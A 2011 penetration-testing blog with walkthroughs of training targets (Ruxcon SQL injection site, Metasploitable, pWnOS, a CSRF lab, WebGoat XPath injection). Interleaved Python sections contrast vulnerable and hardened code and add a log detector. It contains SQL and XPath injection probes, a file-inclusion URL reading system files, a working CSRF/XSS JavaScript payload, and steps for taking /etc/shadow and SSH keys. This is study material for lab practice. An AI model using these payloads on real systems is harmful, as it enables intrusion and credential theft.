Tuesday, November 8, 2011

[Learning] SQL injection - ruxcon training website



Links:
watch the HD video online: http://vimeo.com/f4l13n5now/sqli-ruxcon

Description:

This is the Ruxcon web pen-testing training website (used to practise SQL injection), provided by Louis.

Attacker:
Backtrack 5 R2
IP: 192.168.1.60

Victim:
Photoblog (training website)
IP: 192.168.1.56

vulnerability & exploit:
MySQL based SQL injection

Attacking process:
1, discover the vulnerable services:
use Nmap to probe the open ports and detect services
nmap -sS -sV -O 192.168.1.56 -v

found the following services:
[1] MySQL database service running on port 3306
[2] HTTP web service running on port 80

2, browse the website and find the injection point
[1] the potentially vulnerable URL: http://192.168.1.56/cat.php?id=1

3, test whether the potential injection point is vulnerable
[1] numeric-based SQL injection test:
request the following two URLs and compare the responses.
URL one "http://192.168.1.56/cat.php?id=1 and 1=2" (responds with nothing)
vs.
URL two "http://192.168.1.56/cat.php?id=1 and 1=1" (responds with the normal page)

the test above shows that this is a vulnerable SQL injection point.

4, exploit the injection point and finally get admin.
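
As an added illustration (not part of the original post and not the training website's code): a Python model of the cat.php lookup, showing the string-concatenated query that makes the "1=1" vs "1=2" probe behave differently beside a hardened form, followed by a small detector that flags that probe pair in access log lines. SQLite stands in for MySQL, and the table, column names and Apache-style log lines are constructed for the example.

```python
import re
import sqlite3
from urllib.parse import urlparse, parse_qs

# --- constructed stand-in for the photoblog's category table (SQLite, not MySQL) ---
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE categories (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO categories VALUES (?, ?)",
                     [(1, "landscape"), (2, "portrait")])
    return conn

def lookup_vulnerable(conn, raw_id):
    # The id parameter is pasted straight into the statement, so "1 and 1=2"
    # becomes part of the WHERE clause: that is why the two probe URLs differ.
    return conn.execute("SELECT name FROM categories WHERE id = " + raw_id).fetchall()

def lookup_hardened(conn, raw_id):
    # Two layers: a strict type check rejects anything that is not an integer,
    # and the value travels as a bound parameter, never as SQL text.
    try:
        cat_id = int(raw_id)
    except ValueError:
        return None  # caller should answer 400 Bad Request
    return conn.execute("SELECT name FROM categories WHERE id = ?", (cat_id,)).fetchall()

# --- detection side: spot the tautology/contradiction pair in access logs ---
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# "and 1=1", "or 2=2", "and 1=2" ... inside a query-string value (case-insensitive)
BOOL_RE = re.compile(r"\b(?:and|or)\b\s*(\d+)\s*=\s*(\d+)", re.IGNORECASE)

def flag_boolean_probes(log_lines):
    """Return {(client_ip, path, param): [labels]} for every parameter that
    received a boolean probe; a source that produced both labels ran the
    1=1 vs 1=2 comparison described in the post."""
    probes = {}
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        url = urlparse(m.group("target"))
        params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
        for name, values in params.items():
            for value in values:
                hit = BOOL_RE.search(value)
                if hit is None:
                    continue
                label = "tautology" if hit.group(1) == hit.group(2) else "contradiction"
                probes.setdefault((m.group("ip"), url.path, name), set()).add(label)
    return {key: sorted(labels) for key, labels in probes.items()}

# Constructed log lines modelled on the probe in the post (attacker IP from the post).
SAMPLE_LOG = [
    '192.168.1.60 - - [08/Nov/2011:10:00:01 +1100] "GET /cat.php?id=1 HTTP/1.1" 200 5120',
    '192.168.1.60 - - [08/Nov/2011:10:00:05 +1100] "GET /cat.php?id=1%20and%201=2 HTTP/1.1" 200 311',
    '192.168.1.60 - - [08/Nov/2011:10:00:09 +1100] "GET /cat.php?id=1%20and%201=1 HTTP/1.1" 200 5120',
    '192.168.1.77 - - [08/Nov/2011:10:01:00 +1100] "GET /cat.php?id=2 HTTP/1.1" 200 4870',
]

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, id=1 and 1=2 ->", lookup_vulnerable(db, "1 and 1=2"))
    print("vulnerable, id=1 and 1=1 ->", lookup_vulnerable(db, "1 and 1=1"))
    print("hardened,   id=1 and 1=1 ->", lookup_hardened(db, "1 and 1=1"))
    print("probes:", flag_boolean_probes(SAMPLE_LOG))
```

The detector keys on the client, path and parameter so that a single source sending both the always-true and the always-false form stands out; a lone "1=1" in a value is worth a look but the pair is the stronger signal, and the much smaller response size on the "1=2" request is a second field a log pipeline can correlate.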

Reference:
[1] https://www.owasp.org/index.php/Unrestricted_File_Upload
[2] http://dev.mysql.com/doc/refman/5.0/en/tables-table.html
[3] http://hungred.com/useful-information/secure-file-upload-check-list-php/
[4] http://soroush.secproject.com/blog/2010/03/improve-file-uploaders%e2%80%99-protections-rev-1-0/

Saturday, October 29, 2011

[Learning] Metasploitable - Distcc



Links:
watch the HD video online: http://vimeo.com/f4l13n5now/distcc

Description:
"Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql."
-- metasploit team

Attacker:
Backtrack 5 R2
IP: 10.10.10.128/24

Victim:
metasploitable
IP: 10.10.10.129/24

vulnerability & exploit:
1, DistCC Daemon Command Execution
2, Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit

Attacking process:
1, discover the vulnerable services:
use Nmap to probe the open ports and services
nmap -sS -sV -p0-65535 -O 10.10.10.129 -v

found the following services:
[1] distccd service running on port 3632
[2] Debian openSSH running on port 22

2, exploit vulnerable services:
[1] exploit the distccd service to get into the victim server with limited privileges
[2] collect the SSH key file information
[3] exploit the Debian OpenSSH weakness to get into the victim server with root privileges

Reference:
[1] Metasploitable download link
[2] Tutorial on g0tmi1k's Blog
[3] Metasploitable official website

Sunday, October 23, 2011

[Update] pWnOS v1

Two more vulnerabilities:

1, There is another vulnerability that can be used to get root privileges locally; here is the exploit:

Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit [3]

2, an RFI vulnerability was found in "/index1.php"; the vulnerable URL is:
http://192.168.1.107/index1.php?connect=/etc/password

The bug in index1.php:
...
if($_GET['connect'] != 'true'){
    include($_GET['connect']);        // the user's input is passed to include() unchanged
}
...
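
As an added example (not the pWnOS code): a Python model of the include($_GET['connect']) pattern beside a hardened page loader that resolves the request through a fixed allowlist instead of using client text as a path. The web root, its two page files and the file that must not be served are all constructed in a temporary directory.

```python
import os
import tempfile

def make_webroot():
    """Constructed fixture: a throwaway web root with two legitimate include
    targets under pages/ and one file that must never be served."""
    root = tempfile.mkdtemp(prefix="rfi_demo_")
    pages = os.path.join(root, "pages")
    os.mkdir(pages)
    for name in ("home", "about"):
        with open(os.path.join(pages, name + ".php"), "w") as f:
            f.write("<h1>%s</h1>" % name)
    secret = os.path.join(root, "secret.txt")
    with open(secret, "w") as f:
        f.write("not-for-the-web")
    return root, secret

def include_vulnerable(root, connect):
    # Mirrors include($_GET['connect']): the client-supplied string is used as
    # the path, so any readable local file (or, with allow_url_include enabled
    # in PHP, a remote URL) is pulled into the page.
    with open(connect) as f:
        return f.read()

ALLOWED_PAGES = {"home", "about"}  # the only names the loader should ever accept

def include_hardened(root, connect):
    # 1. The request selects an entry from a fixed allowlist; anything else
    #    (absolute paths, URLs, "../" sequences) is refused before any I/O.
    if connect not in ALLOWED_PAGES:
        return None
    # 2. The filesystem path is built from the allowlist entry, not from client
    #    text, and is still confirmed to resolve inside pages/ as a second guard.
    pages_dir = os.path.realpath(os.path.join(root, "pages"))
    target = os.path.realpath(os.path.join(pages_dir, connect + ".php"))
    if os.path.commonpath([pages_dir, target]) != pages_dir:
        return None
    with open(target) as f:
        return f.read()

if __name__ == "__main__":
    root, secret = make_webroot()
    print("vulnerable, connect=<secret path> ->", include_vulnerable(root, secret))
    print("hardened,   connect=<secret path> ->", include_hardened(root, secret))
    print("hardened,   connect=home          ->", include_hardened(root, "home"))
```

The allowlist is the real control; the realpath check only guards against a later change that starts deriving the name from request data again. In PHP the same shape is a switch or array lookup from the connect value to a fixed filename, with allow_url_include left off.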

Saturday, October 22, 2011

[Learning] pWnOS v1



Links:
watch the HD video online: http://vimeo.com/30946182


Description:
"pWnOS focuses more on exploitation. All of the exploits are found from milw0rm.com so you won't have to scour the Internet for some obscure exploit. There are a couple different paths to root...so if you get one you can keep working to figure out the other."
-- bond00

Attacker:
Backtrack 5 R2 [VM]
IP: 192.168.1.108

Victim:
pWnOS v1 [VM]
IP: 192.168.1.110


Vulnerability & Exploit:
1, Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit
2, Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit
3, Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit

Attacking process:
1, discover the vulnerable services:
use Nmap to probe the open ports and services
nmap -sS -sV -O -A 192.168.1.110 -v
found the following services:
[1] webmin httpd       open on port 10000
[2] Debian openSSH     open on port 22

2, exploit vulnerable services:
[1] exploit the webmin service to get the password file "/etc/shadow", then find the users:
vmware
obama
osama
yomama
[2] exploit the webmin service to get the OpenSSH key files from the default path: "/home/$USER/.ssh/authorized_keys" (replace $USER with vmware, obama, osama and yomama)
[3] exploit the Debian OpenSSH weakness to get into the victim server
[4] use the vmsplice Local Root Exploit to get root privileges


Reference:
[1] pWnOS download link (http://0dayclub.com/files/pWnOS%20v1.0.zip)
[2] g0tmi1k's Blog (http://g0tmi1k.blogspot.com/2010/04/video-pwnos.html)
[3] pWnOS forum (http://forums.heorot.net/viewforum.php?f=21)


Monday, September 5, 2011

Play with CSRF

Cross-Site Request Forgery (CSRF/XSRF)

A kind of injection vulnerability, used by an attacker to exploit the trust that a site has in an authorized user.
For more information please check the references.

Victim:  Ghost VM (XSS & CSRF), admin user on Ghost server
Attacker:  test user on Ghost server

Attacking process:
1, Log in to the Ghost server as the admin user
2, submit "<script>alert(1)</script>" to check whether there is an XSS vulnerability. Of course there is...

3, use a web proxy (such as Burp) to check and analyze how the web application works...
here, we enter the test string "abc" and submit.
Burp captures the first request:

Burp captures the second request:

Now we understand how it works:
Two requests are sent to the server, so we need to send two requests when writing the attacking script.

we construct the malicious JavaScript:

<script>
function test()
{
  var pd="vuln=<h1>Hacked%20by%20F4l13n5n0w&user=admin";
  var xmlhttp=new XMLHttpRequest();
  xmlhttp.onreadystatechange=function() {
    var xmlhttp2=new XMLHttpRequest();
    xmlhttp2.open("GET", "/ghost/iframe.php?page=form.php", true);
    xmlhttp2.send();
  };
  xmlhttp.open("POST", "/ghost/blogView.php", true);
  xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  xmlhttp.send(pd);
}
</script>
Hi admin, Here is a problem. Pls <a href="" onclick="test()">check!</a>

Log in to the server as the test user, submit the attacking code, and then we just wait for the admin to click it.

If the admin is tricked and clicks the "check" link, he will submit the sentence "Hacked by F4l13n5n0w" to the server in the background.

Done.
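
As an added example (not the Ghost VM's code): a Python model of the server side of the post above, showing the two checks that stop a forged blogView.php-style submission, a per-session CSRF token and an Origin/Referer check, together with the output encoding that closes the stored-XSS half of the finding. The origin, the session store and the form field names are assumptions for the example.

```python
import hmac
import html
import secrets

SITE_ORIGIN = "http://ghost.example"   # hypothetical origin of the Ghost VM
SESSIONS = {}                           # session id -> session record (in-memory stand-in)

def login(user):
    """Create a session and a per-session CSRF token; returns the session id
    the browser would carry in its cookie."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "csrf_token": secrets.token_hex(32)}
    return sid

def render_form(sid):
    """The legitimate form (form.php in the post) embeds the token as a hidden
    field; only a page served by the site itself can obtain it."""
    sess = SESSIONS[sid]
    return {"vuln": "", "user": sess["user"], "csrf_token": sess["csrf_token"]}

def escape_for_html(text):
    """Output encoding for the stored-XSS half of the post: submitted text is
    rendered as text, so <script>alert(1)</script> is displayed, not executed."""
    return html.escape(text, quote=True)

def handle_post(sid, headers, form):
    """blogView.php-style handler: accept the post only when the request carries
    a valid token for this session and does not come from a foreign origin."""
    sess = SESSIONS.get(sid)
    if sess is None:
        return 401, "no session"
    # Check 1: when the browser sends Origin (or Referer), it must name our site.
    origin = headers.get("Origin") or headers.get("Referer") or ""
    if origin and origin != SITE_ORIGIN and not origin.startswith(SITE_ORIGIN + "/"):
        return 403, "cross-site request refused"
    # Check 2: the token must be present and match, compared in constant time.
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(supplied.encode(), sess["csrf_token"].encode()):
        return 403, "missing or invalid CSRF token"
    return 200, "stored post for %s: %s" % (sess["user"], escape_for_html(form.get("vuln", "")))

if __name__ == "__main__":
    admin = login("admin")
    # Forged request: the browser attaches the admin's cookie, but a page on
    # another site cannot read the token and announces its own Origin.
    print(handle_post(admin, {"Origin": "http://attacker.example"}, {"vuln": "x", "user": "admin"}))
    print(handle_post(admin, {}, {"vuln": "x", "user": "admin"}))
    # Legitimate submission from the site's own form.
    form = render_form(admin)
    form["vuln"] = "<script>alert(1)</script>"
    print(handle_post(admin, {"Origin": SITE_ORIGIN}, form))
```

One caveat that the post's scenario makes concrete: the attacking script was stored on the same site through the XSS, so its XMLHttpRequest calls are same-origin, pass the Origin check, and could fetch the token from form.php. The token and origin checks stop forgery from other sites; the same-site case is only closed by fixing the XSS itself (the output encoding above, and a Content-Security-Policy where the application allows it).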


Reference:
[1] http://www.cgisecurity.com/csrf-faq.html
[2] https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
[3] http://www.w3schools.com/ajax/ajax_xmlhttprequest_send.asp



Tuesday, August 23, 2011

Play with XPATH Blind Explorer

xpath-blind-explorer v1.0 was released at Black Hat USA 2011.

This is an automated tool to explore the whole XML content by using an XPath injection vulnerability.

check the following links for more information:

Demo video:
https://www.youtube.com/watch?v=IDQAj09fBvI&feature=related

Download:
http://code.google.com/p/xpath-blind-explorer/downloads/list


In the demo video, only the GET method with one parameter was presented.

What about the POST method with multiple parameters?

Let's use it against the WebGoat XPath Injection challenge.

Victim:       WebGoat (XPATH Injection Lesson)
Attacker:   Windows with xpath-blind-explorer v1.0

Attacking process:

1, submit correct/incorrect username and password (e.g. Mike/test123) to check the difference between the responses.




If the username and password are correct, the server returns the user's information; otherwise it returns nothing.
So here we use "468100" as the "true" condition keyword.


2, check the source code to find the form's request URL and parameter names
using Firebug, we get the request URL:

http://192.168.235.134/WebGoat/attack?Screen=83&menu=1200

The parameter names:

Username, Password and SUBMIT


3, Configure XPath Blind Explorer as follows:




Use Burp Proxy (listening on localhost, port 8080) to check how the request is created

Add the session cookie in order to pass authentication with the WebGoat server


4, Now we test the condition

test the "true" condition:

Let's look at the request captured by Burp Proxy.




The injection code "'%20and%20'1'='1" is just appended at the end of all of the parameters (which are URL encoded). That means XPath Blind Explorer treats the multiple parameters as a single parameter (in the capture, the blue "Username" is the parameter name and the red part is the value, which was URL encoded).

So now we need to solve two problems:

1, The injection code is only appended at the end of the parameters, so we need to change the order of the parameters. Let's put the injectable parameter at the end, such as:

SUBMIT=Submit&Username=Mike&Password=test123


2, Because XPath Blind Explorer treats all parameters as a single parameter, the parameters are URL encoded including the parameter separator "&" (which is encoded to "%26" but should not be encoded). So we need to replace it back to "&".

Here we use Burp Proxy's "match and replace" function, configured as follows.


Here the regex "(%26)" is used to match the keyword.



Now everything is done~ Let's launch it.

After waiting several minutes, we get the whole XML file~
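
As an added example (not WebGoat's code and not part of the tool): the server-side view of what the tool above is exploiting. The first function shows the shape of a lookup assembled by string concatenation, where the quote in the password closes the XPath literal and the appended " and '1'='1" becomes part of the predicate; the second is a hardened lookup that keeps client text out of the XPath grammar entirely. The employee XML, names and ids are constructed; 468100 is the keyword from the post.

```python
import hmac
import xml.etree.ElementTree as ET

# Constructed stand-in for the lesson's employee records (names and ids are
# invented; 468100 is the "true"-condition keyword used in the post).
EMPLOYEES_XML = """<employees>
  <employee>
    <username>Mike</username><password>test123</password>
    <userid>101</userid><salary>468100</salary>
  </employee>
  <employee>
    <username>John</username><password>letmein</password>
    <userid>102</userid><salary>30000</salary>
  </employee>
</employees>"""

def build_expression_unsafe(username, password):
    """Hypothetical concatenated lookup, the pattern the lesson is about. Client
    text becomes XPath grammar: a quote in the password closes the string
    literal, and the rest of the input (" and '1'='1") is parsed as predicate."""
    return "//employee[username/text()='%s' and password/text()='%s']" % (username, password)

def lookup_safe(xml_text, username, password):
    """Hardened lookup: the XPath is a fixed structural path with no client text
    in it, and the credential comparison happens in Python, in constant time.
    A password of "test123' and '1'='1" is simply a string that matches nothing."""
    root = ET.fromstring(xml_text)
    for emp in root.iterfind("./employee"):
        if emp.findtext("username", "") != username:
            continue
        stored = emp.findtext("password", "")
        if hmac.compare_digest(stored.encode(), password.encode()):
            return {"userid": emp.findtext("userid"), "salary": emp.findtext("salary")}
    return None

if __name__ == "__main__":
    print(build_expression_unsafe("Mike", "test123' and '1'='1"))
    print(lookup_safe(EMPLOYEES_XML, "Mike", "test123"))               # record found
    print(lookup_safe(EMPLOYEES_XML, "Mike", "test123' and '1'='1"))   # None: plain string compare
```

Where the application really needs XPath for the selection, lxml's xpath() accepts the values as variables (`root.xpath("//employee[username=$u and password=$p]", u=username, p=password)`), which keeps them out of the expression text in the same way; the standard-library ElementTree has no variable binding, hence the Python-side comparison here. Either way the blind-extraction loop in the post has nothing to work with, because no injected predicate ever changes the response.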

Reference:
[1] http://penetration-testing.7safe.com/the-art-of-exploiting-lesser-known-injection-flaws-revealed-at-black-hat/
[2] http://www.zytrax.com/tech/web/regex.htm
[3] http://www.addedbytes.com/cheat-sheets/regular-expressions-cheat-sheet/
[4] http://www.regextester.com/